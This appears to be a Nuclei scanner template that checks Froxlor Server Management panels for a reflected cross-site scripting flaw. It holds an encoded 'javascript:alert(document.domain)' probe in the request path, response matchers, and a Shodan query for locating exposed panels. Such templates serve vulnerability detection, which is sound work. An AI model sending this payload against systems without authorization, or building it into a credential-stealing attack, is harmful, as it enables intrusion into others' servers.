id: froxlor-xss

info:
  name: Froxlor Server Management - Cross-Site Scripting
  author: tess
  severity: medium
  description: |
    Froxlor Server Management is susceptible to cross-site scripting via clicking the forgot password link. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Froxlor Server Management Panel"
  tags: froxlor,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "javascript&colon;alert(document.domain);dd&sol;&sol;"
          - "Froxlor"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100e766952b82e53220933d4d9e34f0627dc7308faf01805225a01f17a34764ebc002205502af3c8f45465ff30152794a0a7a0f89b85ef7639055889e339068425b72bc:922c64590222798bb761d5b6d8e72950
